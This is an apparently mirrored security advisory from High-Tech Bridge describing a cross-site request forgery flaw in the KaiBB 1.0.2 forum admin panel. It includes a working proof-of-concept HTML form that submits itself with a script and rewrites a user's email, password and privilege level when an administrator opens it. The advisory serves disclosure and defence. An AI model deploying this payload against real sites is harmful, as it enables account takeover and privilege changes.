Lucene search
K

KaiBB 1.0.2 Cross Site Request Forgery

🗓️ 27 Jan 2011 00:00:00Reported by High-Tech Bridge SAType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

Vulnerability in KaiBB 1.0.2 allows Cross Site Request Forgery attac

Code
`Vulnerability ID: HTB22793  
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_kaibb.html  
Product: KaiBB  
Vendor: Mi-Dia ( http://www.kaibb.co.uk/ )   
Vulnerable Version: 1.0.2 and probably prior versions  
Vendor Notification: 13 January 2011   
Vulnerability Type: CSRF (Cross-Site Request Forgery)  
Status: Awaiting Vendor Response  
Risk level: Low   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
The vulnerability exists due to failure in the "admin/core/account.php" script to properly verify the source of HTTP request.  
  
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.  
  
Attacker can use browser to exploit this vulnerability. The following PoC is available:  
  
<form action="http://host/admin/?area=users&s=account&a=USERID" method="post">  
<input type="hidden" name="regemail" value="[email protected]">  
<input type="hidden" name="regpass" value="">  
<input type="hidden" name="regname" value="test">  
<input type="hidden" name="justip" value="0">  
<input type="hidden" name="reglevel" value="2">  
<input type="hidden" name="rankselect" value="1">  
<input type="hidden" name="sfrozen" value="0">  
<input type="hidden" name="notes" value="">  
<input type="hidden" name="signature" value="">  
<input type="submit" id="btn" name="Submit" value="Update">  
</form>  
<script>  
document.getElementById('btn').click();  
</script>  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Jan 2011 00:00Current
0.7Low risk
Vulners AI Score0.7
17